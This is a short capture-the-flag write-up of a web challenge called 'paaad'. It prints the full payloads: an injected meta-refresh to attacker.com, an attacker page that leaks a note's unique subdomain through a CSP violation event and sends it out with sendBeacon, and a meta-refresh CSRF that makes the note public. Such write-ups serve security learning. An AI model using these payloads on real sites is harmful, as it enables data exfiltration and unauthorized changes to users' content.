Tags: web 

Rating: 5.0

tl;dr

  • Meta-refresh redirect to the attacker's website, using the HTML injection in the paaad pad.
  • Leak the note's unique subdomain through a CSP violation event on the attacker's page.
  • A second meta-refresh CSRF against the leaked subdomain makes the note public.

First pad

<!-- redirect to attacker site -->
<meta http-equiv="refresh" content="1; url=https://attacker.com/attacker.html">

https://attacker.com/attacker.html

<html>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="Content-Security-Policy" content="frame-src 'self' xn--pd-viaaa.space;">
    <title>TEST</title>
</head>

<body>
    <script>
        // The framed /p/latest answers with a redirect to the note's unique
        // subdomain. That host is not in this page's frame-src, so the browser
        // blocks the redirected load and fires a securitypolicyviolation event
        // whose blockedURI carries the subdomain; sendBeacon posts it back here.
        document.addEventListener('securitypolicyviolation', function (event) {
            console.log(event);
            navigator.sendBeacon(location.href, event.blockedURI);
        });
    </script>
    <iframe src="https://päääd.space/p/latest"></iframe>
</body>

</html>

Second pad

<!-- to make the pad public -->
<meta http-equiv="refresh" content="1; url=https://unique_id.xn--pd-viaaa.space/?edit=isPublic">
Original writeup (http://blog.bi0s.in/2023/10/16/Web/paaad-Hack.luCTF20232023/).